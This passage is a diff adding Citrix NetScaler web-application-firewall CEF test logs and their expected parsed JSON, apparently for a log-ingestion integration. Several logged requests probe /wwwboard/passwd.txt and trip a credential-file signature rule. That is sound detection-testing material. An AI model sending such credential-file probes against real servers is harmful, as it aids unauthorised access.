diff --git a/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-cef.log b/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-cef.log
new file mode 100644
index 00000000000..24ec5f26255
--- /dev/null
+++ b/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-cef.log
@@ -0,0 +1,10 @@ +Jun 12 23:37:17 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=47606 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. cn1=1340 cn2=653 cs1=pr_ffc cs2=PPE1 cs3=EsdGd3VD0OaaURLcZnj05Y6DOmE0002 cs4=ALERT cs5=2015 act=blocked +Jun 13 00:21:28 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_FIELDCONSISTENCY|6|src=175.16.199.1 spt=761 method=GET request=http://aaron.stratum8.net/FFC/login.php?login_name=abc&passwd=123456789234&drinking_pref=on&text_area=&loginButton=ClickToLogin&as_sfid=AAAAAAWIahZuYoIFbjBhYMP05mJLTwEfIY0a7AKGMg3jIBaKmwtK4t7M7lNxOgj7Gmd3SZc8KUj6CR6a7W5kIWDRHN8PtK1Zc-txHkHNx1WknuG9DzTuM7t1THhluevXu9I4kp8%3D&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c msg=Field consistency check failed for field passwd cn1=1401 cn2=707 cs1=pr_ffc cs2=PPE1 cs3=Ycby5IvjL6FoVa6Ah94QFTIUpC80001 cs4=ALERT cs5=2015 act=not blocked +Jun 13 00:25:31 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_SAFECOMMERCE|6|src=175.16.199.1 spt=34041 method=GET request=http://aaron.stratum8.net/FFC/CreditCardMind.html msg=Maximum number of potential credit card numbers seen cn1=1470 cn2=708 cs1=pr_ffc cs2=PPE1 cs3=Ycby5IvjL6FoVa6Ah94QFTIUpC80001 cs4=ALERT cs5=2015 act=transformed +Jun 13 01:11:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_SIGNATURE_MATCH|6|src=175.16.199.1 spt=61141 method=GET request=http://aaron.stratum8.net/FFC/wwwboard/passwd.txt msg=Signature violation rule ID 807: web-cgi /wwwboard/passwd.txt access cn1=140 cn2=841 cs1=pr_ffc cs2=PPE0 cs3=OyTgjbXBqcpBFeENKDlde3OkMQ00001 cs4=ALERT cs5=2015 cs6=web-cgi act=blocked +June 8 00:21:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 geolocation=NorthAmerica.US.Arizona.Tucson.*.* spt=18655 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. 
cn1=77 cn2=1547 cs1=test_pr_adv cs2=PPE1 cs3=KDynjg1pbFtfhC/nt0rBU1o/Tyg0001 cs4=ALERT cs5=2015 act=not blocked +June 9 23:50:53 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 geolocation=Unknown spt=5086 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. cn1=74 cn2=1576 cs1=test_pr_adv cs2=PPE2 cs3=PyR0eOEM4gf6GJiTyauiHByL88E0002 cs4=ALERT cs5=2015 act=not blocked +Dec 19 00:38:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SAFECOMMERCE_XFORM|6|src=175.16.199.1 spt=56116 method=GET request=http://vpx247.example.net/FFC/CreditCardMind.html msg= Transformed (xout) potential credit card numbers seen in server response cn1=652 cn2=610 cs1=pr_ffc cs2=PPE0 cs3=li8MdGfW49uG8tGdSV85ech41a0A000 cs4=ALERT cs5=2012 act=transformed +Dec 19 00:38:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SAFECOMMERCE|6|src=175.16.199.1 spt=56116 method=GET request=http://vpx247.example.net/FFC/CreditCardMind.html msg= Maximum no. of potential credit card numbers seen cn1=653 cn2=610 cs1=pr_ffc cs2=PPE0 cs3=li8MdGfW49uG8tGdSV85ech41a0A000 cs4=ALERT cs5=2012 act=transformed +Dec 18 21:46:17 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=54711 method=GET request=http://vpx247.example.net/FFC/login_post.html?abc\=def msg=Disallow Illegal URL. cn1=465 cn2=535 cs1=profile1 cs2=PPE0 cs3=IliG4Dxp1SjOhKVRDVBXmqvAaIcA000 cs4=ALERT cs5=2012 act=not blocked +Dec 19 01:07:56 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SIGNATURE_MATCH|6|src=175.16.199.1 spt=56687 method=GET request=http://vpx247.example.net/FFC/wwwboard/passwd.txt msg= Signature violation rule ID 807: web-cgi /wwwboard/passwd.txt access cn1=224 cn2=205 cs1=pr_ffc cs2=PPE0 cs3=POousP7CIMW5nwZ5Rs4nq5DND0sA000 cs4=ALERT cs5=2012 act=not blocked 
diff --git a/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-cef.log-expected.json b/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-cef.log-expected.json
new file mode 100644
index 00000000000..f9b49654d5c
--- /dev/null
+++ b/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-citrix-waf-cef.log-expected.json
@@ -0,0 +1,843 @@ +{ + "expected": [ + { + "@timestamp": "2015-06-12T23:37:17.000Z", + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=47606 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. cn1=1340 cn2=653 cs1=pr_ffc cs2=PPE1 cs3=EsdGd3VD0OaaURLcZnj05Y6DOmE0002 cs4=ALERT cs5=2015 act=blocked", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS11.0", + "facility": "local0", + "name": "APPFW_STARTURL", + "ppe_id": "PPE1", + "priority": "info", + "profile_name": "pr_ffc", + "session_id": "EsdGd3VD0OaaURLcZnj05Y6DOmE0002", + "severity": "ALERT" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "blocked", + "id": "1340", + "original": "Jun 12 23:37:17 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=47606 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. 
cn1=1340 cn2=653 cs1=pr_ffc cs2=PPE1 cs3=EsdGd3VD0OaaURLcZnj05Y6DOmE0002 cs4=ALERT cs5=2015 act=blocked", + "severity": 6, + "timezone": "UTC" + }, + "http": { + "request": { + "id": "653", + "method": "GET" + } + }, + "message": "Disallow Illegal URL.", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 47606 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "aaron.stratum8.net", + "extension": "html", + "original": "http://aaron.stratum8.net/FFC/login.html", + "path": "/FFC/login.html", + "scheme": "http" + } + }, + { + "@timestamp": "2015-06-13T00:21:28.000Z", + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_FIELDCONSISTENCY|6|src=175.16.199.1 spt=761 method=GET request=http://aaron.stratum8.net/FFC/login.php?login_name=abc&passwd=123456789234&drinking_pref=on&text_area=&loginButton=ClickToLogin&as_sfid=AAAAAAWIahZuYoIFbjBhYMP05mJLTwEfIY0a7AKGMg3jIBaKmwtK4t7M7lNxOgj7Gmd3SZc8KUj6CR6a7W5kIWDRHN8PtK1Zc-txHkHNx1WknuG9DzTuM7t1THhluevXu9I4kp8%3D&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c msg=Field consistency check failed for field passwd cn1=1401 cn2=707 cs1=pr_ffc cs2=PPE1 cs3=Ycby5IvjL6FoVa6Ah94QFTIUpC80001 cs4=ALERT cs5=2015 act=not blocked", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS11.0", + "facility": "local0", + "name": "APPFW_FIELDCONSISTENCY", + "ppe_id": "PPE1", + "priority": "info", + "profile_name": "pr_ffc", + "session_id": "Ycby5IvjL6FoVa6Ah94QFTIUpC80001", + "severity": "ALERT" + }, + "client": { + "geo": { + "city_name": 
"London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "not blocked", + "id": "1401", + "original": "Jun 13 00:21:28 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_FIELDCONSISTENCY|6|src=175.16.199.1 spt=761 method=GET request=http://aaron.stratum8.net/FFC/login.php?login_name=abc&passwd=123456789234&drinking_pref=on&text_area=&loginButton=ClickToLogin&as_sfid=AAAAAAWIahZuYoIFbjBhYMP05mJLTwEfIY0a7AKGMg3jIBaKmwtK4t7M7lNxOgj7Gmd3SZc8KUj6CR6a7W5kIWDRHN8PtK1Zc-txHkHNx1WknuG9DzTuM7t1THhluevXu9I4kp8%3D&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c msg=Field consistency check failed for field passwd cn1=1401 cn2=707 cs1=pr_ffc cs2=PPE1 cs3=Ycby5IvjL6FoVa6Ah94QFTIUpC80001 cs4=ALERT cs5=2015 act=not blocked", + "severity": 6, + "timezone": "UTC" + }, + "http": { + "request": { + "id": "707", + "method": "GET" + } + }, + "message": "Field consistency check failed for field passwd", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 761 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "aaron.stratum8.net", + "extension": "php", + "original": 
"http://aaron.stratum8.net/FFC/login.php?login_name=abc&passwd=123456789234&drinking_pref=on&text_area=&loginButton=ClickToLogin&as_sfid=AAAAAAWIahZuYoIFbjBhYMP05mJLTwEfIY0a7AKGMg3jIBaKmwtK4t7M7lNxOgj7Gmd3SZc8KUj6CR6a7W5kIWDRHN8PtK1Zc-txHkHNx1WknuG9DzTuM7t1THhluevXu9I4kp8%3D&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c", + "path": "/FFC/login.php", + "query": "login_name=abc&passwd=123456789234&drinking_pref=on&text_area=&loginButton=ClickToLogin&as_sfid=AAAAAAWIahZuYoIFbjBhYMP05mJLTwEfIY0a7AKGMg3jIBaKmwtK4t7M7lNxOgj7Gmd3SZc8KUj6CR6a7W5kIWDRHN8PtK1Zc-txHkHNx1WknuG9DzTuM7t1THhluevXu9I4kp8=&as_fid=feeec8758b41740eedeeb6b35b85dfd3d5def30c", + "scheme": "http" + } + }, + { + "@timestamp": "2015-06-13T00:25:31.000Z", + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_SAFECOMMERCE|6|src=175.16.199.1 spt=34041 method=GET request=http://aaron.stratum8.net/FFC/CreditCardMind.html msg=Maximum number of potential credit card numbers seen cn1=1470 cn2=708 cs1=pr_ffc cs2=PPE1 cs3=Ycby5IvjL6FoVa6Ah94QFTIUpC80001 cs4=ALERT cs5=2015 act=transformed", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS11.0", + "facility": "local0", + "name": "APPFW_SAFECOMMERCE", + "ppe_id": "PPE1", + "priority": "info", + "profile_name": "pr_ffc", + "session_id": "Ycby5IvjL6FoVa6Ah94QFTIUpC80001", + "severity": "ALERT" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "transformed", + "id": "1470", + "original": "Jun 13 00:25:31 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_SAFECOMMERCE|6|src=175.16.199.1 spt=34041 method=GET 
request=http://aaron.stratum8.net/FFC/CreditCardMind.html msg=Maximum number of potential credit card numbers seen cn1=1470 cn2=708 cs1=pr_ffc cs2=PPE1 cs3=Ycby5IvjL6FoVa6Ah94QFTIUpC80001 cs4=ALERT cs5=2015 act=transformed", + "severity": 6, + "timezone": "UTC" + }, + "http": { + "request": { + "id": "708", + "method": "GET" + } + }, + "message": "Maximum number of potential credit card numbers seen", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 34041 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "aaron.stratum8.net", + "extension": "html", + "original": "http://aaron.stratum8.net/FFC/CreditCardMind.html", + "path": "/FFC/CreditCardMind.html", + "scheme": "http" + } + }, + { + "@timestamp": "2015-06-13T01:11:09.000Z", + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_SIGNATURE_MATCH|6|src=175.16.199.1 spt=61141 method=GET request=http://aaron.stratum8.net/FFC/wwwboard/passwd.txt msg=Signature violation rule ID 807: web-cgi /wwwboard/passwd.txt access cn1=140 cn2=841 cs1=pr_ffc cs2=PPE0 cs3=OyTgjbXBqcpBFeENKDlde3OkMQ00001 cs4=ALERT cs5=2015 cs6=web-cgi act=blocked", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS11.0", + "facility": "local0", + "name": "APPFW_SIGNATURE_MATCH", + "ppe_id": "PPE0", + "priority": "info", + "profile_name": "pr_ffc", + "session_id": "OyTgjbXBqcpBFeENKDlde3OkMQ00001", + "severity": "ALERT", + "signature_violation_category": "web-cgi" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": 
"Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "blocked", + "id": "140", + "original": "Jun 13 01:11:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_SIGNATURE_MATCH|6|src=175.16.199.1 spt=61141 method=GET request=http://aaron.stratum8.net/FFC/wwwboard/passwd.txt msg=Signature violation rule ID 807: web-cgi /wwwboard/passwd.txt access cn1=140 cn2=841 cs1=pr_ffc cs2=PPE0 cs3=OyTgjbXBqcpBFeENKDlde3OkMQ00001 cs4=ALERT cs5=2015 cs6=web-cgi act=blocked", + "severity": 6, + "timezone": "UTC" + }, + "http": { + "request": { + "id": "841", + "method": "GET" + } + }, + "message": "Signature violation rule ID 807: web-cgi /wwwboard/passwd.txt access ", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 61141 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "aaron.stratum8.net", + "extension": "txt", + "original": "http://aaron.stratum8.net/FFC/wwwboard/passwd.txt", + "path": "/FFC/wwwboard/passwd.txt", + "scheme": "http" + } + }, + { + "@timestamp": "2015-06-08T00:21:09.000Z", + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 geolocation=NorthAmerica.US.Arizona.Tucson.*.* spt=18655 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. 
cn1=77 cn2=1547 cs1=test_pr_adv cs2=PPE1 cs3=KDynjg1pbFtfhC/nt0rBU1o/Tyg0001 cs4=ALERT cs5=2015 act=not blocked", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS11.0", + "extended": { + "geolocation": "NorthAmerica.US.Arizona.Tucson.*.*" + }, + "facility": "local0", + "name": "APPFW_STARTURL", + "ppe_id": "PPE1", + "priority": "info", + "profile_name": "test_pr_adv", + "session_id": "KDynjg1pbFtfhC/nt0rBU1o/Tyg0001", + "severity": "ALERT" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "not blocked", + "id": "77", + "original": "June 8 00:21:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 geolocation=NorthAmerica.US.Arizona.Tucson.*.* spt=18655 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. 
cn1=77 cn2=1547 cs1=test_pr_adv cs2=PPE1 cs3=KDynjg1pbFtfhC/nt0rBU1o/Tyg0001 cs4=ALERT cs5=2015 act=not blocked", + "severity": 6, + "timezone": "UTC" + }, + "http": { + "request": { + "id": "1547", + "method": "GET" + } + }, + "message": "Disallow Illegal URL.", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 18655 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "aaron.stratum8.net", + "extension": "html", + "original": "http://aaron.stratum8.net/FFC/login.html", + "path": "/FFC/login.html", + "scheme": "http" + } + }, + { + "@timestamp": "2015-06-09T23:50:53.000Z", + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 geolocation=Unknown spt=5086 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. 
cn1=74 cn2=1576 cs1=test_pr_adv cs2=PPE2 cs3=PyR0eOEM4gf6GJiTyauiHByL88E0002 cs4=ALERT cs5=2015 act=not blocked", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS11.0", + "extended": { + "geolocation": "Unknown" + }, + "facility": "local0", + "name": "APPFW_STARTURL", + "ppe_id": "PPE2", + "priority": "info", + "profile_name": "test_pr_adv", + "session_id": "PyR0eOEM4gf6GJiTyauiHByL88E0002", + "severity": "ALERT" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "not blocked", + "id": "74", + "original": "June 9 23:50:53 81.2.69.144 CEF:0|Citrix|NetScaler|NS11.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 geolocation=Unknown spt=5086 method=GET request=http://aaron.stratum8.net/FFC/login.html msg=Disallow Illegal URL. 
cn1=74 cn2=1576 cs1=test_pr_adv cs2=PPE2 cs3=PyR0eOEM4gf6GJiTyauiHByL88E0002 cs4=ALERT cs5=2015 act=not blocked", + "severity": 6, + "timezone": "UTC" + }, + "http": { + "request": { + "id": "1576", + "method": "GET" + } + }, + "message": "Disallow Illegal URL.", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 5086 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "aaron.stratum8.net", + "extension": "html", + "original": "http://aaron.stratum8.net/FFC/login.html", + "path": "/FFC/login.html", + "scheme": "http" + } + }, + { + "@timestamp": "2012-12-19T00:38:09.000Z", + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SAFECOMMERCE_XFORM|6|src=175.16.199.1 spt=56116 method=GET request=http://vpx247.example.net/FFC/CreditCardMind.html msg= Transformed (xout) potential credit card numbers seen in server response cn1=652 cn2=610 cs1=pr_ffc cs2=PPE0 cs3=li8MdGfW49uG8tGdSV85ech41a0A000 cs4=ALERT cs5=2012 act=transformed", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS10.0", + "facility": "local0", + "name": "APPFW_SAFECOMMERCE_XFORM", + "ppe_id": "PPE0", + "priority": "info", + "profile_name": "pr_ffc", + "session_id": "li8MdGfW49uG8tGdSV85ech41a0A000", + "severity": "ALERT" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": 
"81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "transformed", + "id": "652", + "original": "Dec 19 00:38:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SAFECOMMERCE_XFORM|6|src=175.16.199.1 spt=56116 method=GET request=http://vpx247.example.net/FFC/CreditCardMind.html msg= Transformed (xout) potential credit card numbers seen in server response cn1=652 cn2=610 cs1=pr_ffc cs2=PPE0 cs3=li8MdGfW49uG8tGdSV85ech41a0A000 cs4=ALERT cs5=2012 act=transformed", + "severity": 6, + "timezone": "UTC" + }, + "http": { + "request": { + "id": "610", + "method": "GET" + } + }, + "message": " Transformed (xout) potential credit card numbers seen in server response", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 56116 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "vpx247.example.net", + "extension": "html", + "original": "http://vpx247.example.net/FFC/CreditCardMind.html", + "path": "/FFC/CreditCardMind.html", + "scheme": "http" + } + }, + { + "@timestamp": "2012-12-19T00:38:09.000Z", + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SAFECOMMERCE|6|src=175.16.199.1 spt=56116 method=GET request=http://vpx247.example.net/FFC/CreditCardMind.html msg= Maximum no. 
of potential credit card numbers seen cn1=653 cn2=610 cs1=pr_ffc cs2=PPE0 cs3=li8MdGfW49uG8tGdSV85ech41a0A000 cs4=ALERT cs5=2012 act=transformed", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS10.0", + "facility": "local0", + "name": "APPFW_SAFECOMMERCE", + "ppe_id": "PPE0", + "priority": "info", + "profile_name": "pr_ffc", + "session_id": "li8MdGfW49uG8tGdSV85ech41a0A000", + "severity": "ALERT" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "transformed", + "id": "653", + "original": "Dec 19 00:38:09 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SAFECOMMERCE|6|src=175.16.199.1 spt=56116 method=GET request=http://vpx247.example.net/FFC/CreditCardMind.html msg= Maximum no. of potential credit card numbers seen cn1=653 cn2=610 cs1=pr_ffc cs2=PPE0 cs3=li8MdGfW49uG8tGdSV85ech41a0A000 cs4=ALERT cs5=2012 act=transformed", + "severity": 6, + "timezone": "UTC" + }, + "http": { + "request": { + "id": "610", + "method": "GET" + } + }, + "message": " Maximum no. 
of potential credit card numbers seen", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 56116 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "vpx247.example.net", + "extension": "html", + "original": "http://vpx247.example.net/FFC/CreditCardMind.html", + "path": "/FFC/CreditCardMind.html", + "scheme": "http" + } + }, + { + "@timestamp": "2012-12-18T21:46:17.000Z", + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=54711 method=GET request=http://vpx247.example.net/FFC/login_post.html?abc\\=def msg=Disallow Illegal URL. 
cn1=465 cn2=535 cs1=profile1 cs2=PPE0 cs3=IliG4Dxp1SjOhKVRDVBXmqvAaIcA000 cs4=ALERT cs5=2012 act=not blocked", + "device_event_class_id": "APPFW", + "device_product": "NetScaler", + "device_vendor": "Citrix", + "device_version": "NS10.0", + "facility": "local0", + "name": "APPFW_STARTURL", + "ppe_id": "PPE0", + "priority": "info", + "profile_name": "profile1", + "session_id": "IliG4Dxp1SjOhKVRDVBXmqvAaIcA000", + "severity": "ALERT" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "action": "not blocked", + "id": "465", + "original": "Dec 18 21:46:17 81.2.69.144 CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_STARTURL|6|src=175.16.199.1 spt=54711 method=GET request=http://vpx247.example.net/FFC/login_post.html?abc\\=def msg=Disallow Illegal URL. 
cn1=465 cn2=535 cs1=profile1 cs2=PPE0 cs3=IliG4Dxp1SjOhKVRDVBXmqvAaIcA000 cs4=ALERT cs5=2012 act=not blocked", + "severity": 6, + "timezone": "UTC" + }, + "http": { + "request": { + "id": "535", + "method": "GET" + } + }, + "message": "Disallow Illegal URL.", + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "source": { + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "port": 54711 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "vpx247.example.net", + "extension": "html", + "original": "http://vpx247.example.net/FFC/login_post.html?abc\\=def", + "path": "/FFC/login_post.html", + "query": "abc\\=def", + "scheme": "http" + } + }, + { + "@timestamp": "2012-12-19T01:07:56.000Z", + "citrix": { + "cef_format": true, + "cef_version": "0", + "detail": "CEF:0|Citrix|NetScaler|NS10.0|APPFW|APPFW_SIGNATURE_MATCH|6|src=175.16.199.1 spt=56687 method=GET request=http://vpx247.example.net/FFC/wwwboard/passwd.txt msg= Signature violation rule ID 807: web-cgi /wwwboard/passwd.txt access cn1=224 cn2=205 cs1=pr_ffc cs2=PPE0 